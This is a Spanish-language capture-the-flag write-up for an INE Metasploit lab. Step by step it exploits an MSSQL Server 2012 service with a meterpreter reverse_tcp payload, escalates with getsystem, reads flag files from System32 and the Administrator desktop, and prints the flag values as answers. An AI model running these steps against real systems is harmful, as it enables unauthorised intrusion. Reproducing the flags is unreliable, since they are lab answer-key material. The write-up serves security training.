~/write-ups/writeup-dda7d93542
Host & Network Penetration Testing: The Metasploit Framework CTF 1
Imported from Notion: Host & Network Penetration Testing: The Metasploit Framework CTF 1
🧪 Flag 1: Explotando MSSQL Server
Objetivo: Acceder a la cuenta MSSQLSERVER.
- Iniciar servicios y Metasploit:
service postgresql start
msfconsole -q
- Verificar conexión de la base de datos:
db_status
- Escaneo con Nmap desde Metasploit:
db_nmap -p 1433 -sV target.ine.local -sC -O --osscan-guess
✔ Se encontró el servicio Microsoft SQL Server 2012 en el puerto 1433. (Medium)
- Seleccionar y configurar exploit:
search Microsoft SQL Server 2012
use 0
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS target.ine.local
run
-
Meterpreter session exitosa.
-
Acceder a shell y leer la bandera:
shell
cd \
dir
type flag1.txt
👉 Flag 1: c3f6a31554ec41f7beeb6f5260b2527b
✅ Capturada. (Medium)
🧪 Flag 2: Carpeta de Configuración de Windows
Hint: El siguiente flag está en el directorio de configuración de Windows.
- Intentar acceder a configuraciones:
cd C:\Windows\System32\config
✖ Access Denied inicialmente. (Medium)
- Comprobar privilegios disponibles:
getprivs
✔ Se descubre SeImpersonatePrivilege. (Medium)
- Escalada de privilegios:
getsystem
- Acceder a carpeta y leer flag2.txt:
shell
cd C:\Windows\System32\config
dir
type flag2.txt
👉 Flag 2: 9e03002d5c144b2982ac17bdafdb540f
✅ Capturada. (Medium)
🔎 Flag 3: Buscar Archivo Oculto en System32
Hint: Una bandera está escondida en algún lugar de System32.
- Buscar archivos
.txtrecursivamente:
dir C:\Windows\System32\*.txt /s /b
- Encontrar archivo oculto y visualizar:
type C:\Windows\System32\drivers\escaltePrivilegeToGetThisFlag.txt
👉 Flag 3: f96b7f4019d04d5682d34f8e78cc01b8
✅ Capturada. (Medium)
🏁 Flag 4: Escritorio de Administrator
- Navegar al perfil de Administrator:
cd C:\Users\Administrator\Desktop
dir
- Leer archivo flag4.txt:
type flag4.txt
👉 Flag 4: c8c07f571b9e498987233497389b1eee
✅ Capturada. (Medium)
📌 Resumen Final
| Flag | Ubicación | Método |
|---|---|---|
| 1 | MSSQLSERVER | Explotación MSSQL + Meterpreter |
| 2 | Configuración Windows | Privilege Escalation (getsystem) |
| 3 | System32 (archivo oculto) | Búsqueda de archivos |
| 4 | Administrator Desktop | Lectura directa de archivo |
Si quieres, también te puedo poner las capturas de pantalla con enlaces directos incrustados para que lo tengas tipo reporte pro en Notion 👌
- EOF -
<< back_to_index